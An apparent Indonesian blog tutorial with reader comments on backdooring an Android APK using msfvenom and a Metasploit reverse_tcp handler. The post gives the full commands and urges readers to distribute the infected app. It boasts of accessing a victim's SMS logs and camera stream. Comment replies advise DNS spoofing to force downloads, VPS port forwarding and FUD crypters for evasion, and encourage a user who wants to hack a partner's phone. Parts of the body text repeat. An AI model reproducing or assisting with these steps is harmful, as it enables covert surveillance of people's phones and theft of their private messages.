Exploit Android dengan Metasploit
Exploit ini menggunakan metode dengan menyisipkan shell ke dalam apk (injeksi).
Buat temen temen harap hati hati kalau mau download dan install aplikasi, karena dengan di injeksi shell, si attacker dapat melakukan exploit/remote/dll kapan saja ketika android terhubung ke internet (meterpreter opened). Apalagi di android yang jarang di lakukan scan antivirus secara berkala.
Exploit Android dengan Metasploit Kali Linux
Pertama tama kita buat terlebih dahulu backdoor beserta apknya
mymastahh.apk merupakan nama aplikasi, silahkan diganti juga sesuai keinginan.
File apk akan tersimpan di direktori Home
Mari kita jalankan metasploit
Sekarang sebarkan apk yang sudah kalian sisipkan backdoor
:)
Setelah sekian lama menunggu, akirnya ada korban yang sudah menginstall dan membuka aplikasi terinjeksi backdoor buatan saya :v
Status metepreter session sudah opened, saya sudah memiliki akses penuh terhadap android korban, wkwkwk:v
Info spesifikasi android korban
Log sms android korban
wkwkkwkw kasihan amat kuotanya sudah habis :v
Untuk melihat streaming dari kamera korban gunakan perintah
Mouse nya nyala :v
Sticker gopro nya bagus juga yak :3
Buat temen temen harap hati hati kalau mau download dan install aplikasi, karena dengan di injeksi shell, si attacker dapat melakukan exploit/remote/dll kapan saja ketika android terhubung ke internet (meterpreter opened). Apalagi di android yang jarang di lakukan scan antivirus secara berkala.
Exploit Android dengan Metasploit Kali Linux
Pertama tama kita buat terlebih dahulu backdoor beserta apknya
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.186 LPORT=4444 R > mymastahh.apk192.168.43.186 adalah ip address komputer saya (listener), silahkan disesuaikan dengan ip address milik kalian.
mymastahh.apk merupakan nama aplikasi, silahkan diganti juga sesuai keinginan.
File apk akan tersimpan di direktori Home
Mari kita jalankan metasploit
msfconsoleLalu masukkan perintah berikut untuk memulai exploitnya
use exploit/multi/handlerGanti 192.168.43.186 dengan ip address kalian, seperti saat membuat backdoor tadi
set payload android/metepreter/reverse_tcp
set lhost 192.168.43.186
set lport 4444
exploit
Sekarang sebarkan apk yang sudah kalian sisipkan backdoor
:)
Setelah sekian lama menunggu, akirnya ada korban yang sudah menginstall dan membuka aplikasi terinjeksi backdoor buatan saya :v
Status metepreter session sudah opened, saya sudah memiliki akses penuh terhadap android korban, wkwkwk:v
Info spesifikasi android korban
Log sms android korban
wkwkkwkw kasihan amat kuotanya sudah habis :v
Untuk melihat streaming dari kamera korban gunakan perintah
webcam_stream
Mouse nya nyala :v
Sticker gopro nya bagus juga yak :3
wah keren gan. tolong ajarin donk ane sering gagal nih. cara ngirim backdoornya gimana yaa? lewat apa soalnya saya gagal waktu exploitnya. thanks ditunggu
ReplyDeletekalau ane biasanya pake dns spoofing, jadi si target ane paksa biar mau download shell nya
Deletekalau disisipkan ke line/ Ig gimana tuh?
ReplyDeleteBisa :D. Karena di web ini belum ada tutorialnya, silahkan cari di google dulu ya XD. Keyword > How to binding payload meterpreter in to any apk, how to exploit payload meterpreter in to apk, how to embed payload meterpreter into Apk. Supaya lebih mudah coba nyimak video tutorial dari youtube
DeleteIni beda jaringan atau satu jaringan gan ?
ReplyDeleteMasih satu jaringan bro
Deletekalau boleh tahu contoh aplikasinya mastah mana?
ReplyDeleteWuih mantap mastah gilaa bener
ReplyDeleteane udah sukses korban hp sendiri buat testing
Deleteselamat bro :'D
Deletebang klo waktu di install Parse Error "There was a problem parsing the package" itu kenapa ya?
ReplyDeleteane coba pake 2 HH satu OS 6.0.1 sama 7
apa pengaruh versi android nya?
biar support smua versi OS gimana?
itu gara gara security di system androidnya. Hp bagus susah ditembus kwkw
DeleteKalau pingin coba simulasi saja, coba cek menu Security di androidmu.
Hilangin centang di ceklist App permission.
Soalnya payload yg kita buat dari msf dari awal memang masih polosan, wajar aja udah kehadang sama system (padahal belum ada AV nya kwkw)
Video buat matiin beberapa fitur security system android > https://www.youtube.com/watch?v=_oPsC4Q_94c
DeleteBuat payload msf support semua versi Android bisa cari keyword di google > how create persistance back door android atau how create crypter fud for back door msf android
DeleteTanya bagaimana caranya? bakal panjang jelasinnya. Ilmunya luas banget, harus paham pemrograman juga
hi my mastah.. ini kan 1 jaringan yak, kalau misal saya pasang di server VPS dengan jaringan vps trs saya buat payload di vps menggunakan IP public vps, dan kirim backdoor ke target, apa simulasi seperti itu bisa jadi beda jaringan?
ReplyDeleteBisa banget mas :D
DeleteKalau pingin jalankan di pc sendiri bisa nyoba vpn (support port forwarding) atau Router yang ada fitur port forwardingnya
Kalo access denid gimana gan?
ReplyDeleteuntuk android kitkat keatas memang lebih secure :D
Deletemantab nih, semoga bisa dicoba dan berhasil. thanks ya gan.
ReplyDeletesippp bro :D
DeleteRumit tetapi ingin mencoba exploit android. Penasaran ingin hack hp pacar
ReplyDeletesemangat bro :D
Deletegan kenapa suka pending di akhir pasmau masuk menitoringnya
ReplyDeletemohon saran
koneksi juga mempengaruhi, entah dari victim/target atau pc kita
Deletekenapa
ReplyDeleteengga gini gan
msf exploit(handler) >
tapi di saya malah gini
msf exploit(multi/handler) >
mohon saran
memang seperti itu kok mas :D
Deleteudah pernah coba di vps? pas bagian webcam_stream nya ga bisa tampil ni d browser nya.. gmn ngakalinnya ya? thx sblm nya..
ReplyDeleteom mw nanya nih,pas pembuatan payload kenapa "invalid payload selected"?
ReplyDeletemohon responnya om :)
Kak kenapa apk nya gak ada terus bacaan nya no platform was selected, choosing msf.:module::platform::android from the payload mohon di jawab kak
ReplyDelete